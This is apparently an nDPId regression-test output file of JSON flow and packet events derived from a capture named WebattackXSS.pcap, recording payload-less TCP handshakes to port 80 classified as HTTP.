+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347952161,"flow_last_seen":1499347957887,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348081118,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34412,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347952161,"flow_last_seen":1499347957887,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348081118,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34412,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347953439,"flow_last_seen":1499347958887,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348081118,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34426,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347953439,"flow_last_seen":1499347958887,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348081118,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34426,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347954738,"flow_last_seen":1499347959887,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348081118,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34440,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347954738,"flow_last_seen":1499347959887,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348081118,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34440,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9234,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348082422,"flow_last_seen":1499348082422,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348082422,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35776,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9234,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":652,"flow_packet_id":1,"flow_last_seen":1499348082422,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348082422,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8EzVAAD4GspusEAABwKgKMovAAFDEhDu+AAAAAKACchCo6AAAAgQFtAQCCAoBPSiLAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9235,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":652,"flow_packet_id":2,"flow_last_seen":1499348082422,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348082422,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi8Dw+8kBxIQ7v6AScSDx4wAAAgQFtAQCCAoD5vn\/AT0oiwEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9236,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":652,"flow_packet_id":3,"flow_last_seen":1499348082423,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348082423,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0EzZAAD4GsqKsEAABwKgKMovAAFDEhDu\/8PvJAoAQAOWQ6wAAAQEICgE9KIsD5vn\/"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9246,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348083715,"flow_last_seen":1499348083715,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348083715,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35790,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9246,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":653,"flow_packet_id":1,"flow_last_seen":1499348083715,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348083715,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8aIdAAD4GXUmsEAABwKgKMovOAFCsxEFJAAAAAKACchC5zAAAAgQFtAQCCAoBPSnOAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9247,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":653,"flow_packet_id":2,"flow_last_seen":1499348083716,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348083716,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi847RWyhrMRBSqAScSATnAAAAgQFtAQCCAoD5vtCAT0pzgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9248,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":653,"flow_packet_id":3,"flow_last_seen":1499348083716,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348083716,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0aIhAAD4GXVCsEAABwKgKMovOAFCsxEFKO0VsooAQAOWyowAAAQEICgE9Kc4D5vtC"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9264,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348086300,"flow_last_seen":1499348086300,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348086300,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9264,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":654,"flow_packet_id":1,"flow_last_seen":1499348086300,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348086300,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8GytAAD4GqqWsEAABwKgKMovoAFCxvjd\/AAAAAKACchC7\/AAAAgQFtAQCCAoBPSxUAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9265,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":654,"flow_packet_id":2,"flow_last_seen":1499348086300,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348086300,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi+jtWBzhsb43gKAScSCw8gAAAgQFtAQCCAoD5v3IAT0sVAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9266,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":654,"flow_packet_id":3,"flow_last_seen":1499348086301,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348086301,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0GyxAAD4GqqysEAABwKgKMovoAFCxvjeA7Vgc4oAQAOVP+gAAAQEICgE9LFQD5v3I"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9276,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348087568,"flow_last_seen":1499348087568,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348087568,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35830,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9276,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":655,"flow_packet_id":1,"flow_last_seen":1499348087568,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348087568,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8WltAAD4Ga3WsEAABwKgKMov2AFAj3nfKAAAAAKACchAIRwAAAgQFtAQCCAoBPS2RAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9277,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":655,"flow_packet_id":2,"flow_last_seen":1499348087568,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348087568,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi\/boFFliI953y6AScSDEwgAAAgQFtAQCCAoD5v8FAT0tkQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9278,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":655,"flow_packet_id":3,"flow_last_seen":1499348087569,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348087569,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0WlxAAD4Ga3ysEAABwKgKMov2AFAj3nfL6BRZY4AQAOVjygAAAQEICgE9LZED5v8F"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9297,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348090129,"flow_last_seen":1499348090129,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348090129,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35856,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9297,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":656,"flow_packet_id":1,"flow_last_seen":1499348090129,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348090129,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8nGpAAD4GKWasEAABwKgKMowQAFDWkax4AAAAAKACchAeSgAAAgQFtAQCCAoBPTASAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9298,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":656,"flow_packet_id":2,"flow_last_seen":1499348090129,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348090129,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjBAuWbjG1pGseaAScSAynQAAAgQFtAQCCAoD5wGFAT0wEgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":656,"flow_packet_id":3,"flow_last_seen":1499348090130,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348090130,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0nGtAAD4GKW2sEAABwKgKMowQAFDWkax5Llm4x4AQAOXRpAAAAQEICgE9MBID5wGF"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9306,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348091413,"flow_last_seen":1499348091413,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091413,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35870,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9306,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":657,"flow_packet_id":1,"flow_last_seen":1499348091413,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348091413,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8nrdAAD4GJxmsEAABwKgKMoweAFAj3q\/lAAAAAKACchDMQQAAAgQFtAQCCAoBPTFTAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9307,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":657,"flow_packet_id":2,"flow_last_seen":1499348091413,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348091413,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjB4dm6koI96v5qAScSD\/rwAAAgQFtAQCCAoD5wLGAT0xUwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9308,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":657,"flow_packet_id":3,"flow_last_seen":1499348091414,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348091414,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0nrhAAD4GJyCsEAABwKgKMoweAFAj3q\/mHZupKYAQAOWetwAAAQEICgE9MVMD5wLG"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347957282,"flow_last_seen":1499347962887,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34466,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347957282,"flow_last_seen":1499347962887,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34466,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347958588,"flow_last_seen":1499347963888,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34480,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347958588,"flow_last_seen":1499347963888,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34480,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347961167,"flow_last_seen":1499347966888,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34506,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347961167,"flow_last_seen":1499347966888,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34506,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347962480,"flow_last_seen":1499347967888,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34520,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347962480,"flow_last_seen":1499347967888,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34520,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347963774,"flow_last_seen":1499347968888,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34534,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347963774,"flow_last_seen":1499347968888,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34534,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347965133,"flow_last_seen":1499347970889,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34548,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347965133,"flow_last_seen":1499347970889,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34548,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347966420,"flow_last_seen":1499347971889,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34562,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347966420,"flow_last_seen":1499347971889,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34562,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9318,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348092675,"flow_last_seen":1499348092675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348092675,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35884,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9318,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":658,"flow_packet_id":1,"flow_last_seen":1499348092675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348092675,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8WzpAAD4GapasEAABwKgKMowsAFACaGm0AAAAAKACchAyoAAAAgQFtAQCCAoBPTKOAAAAAAEDAwc="} 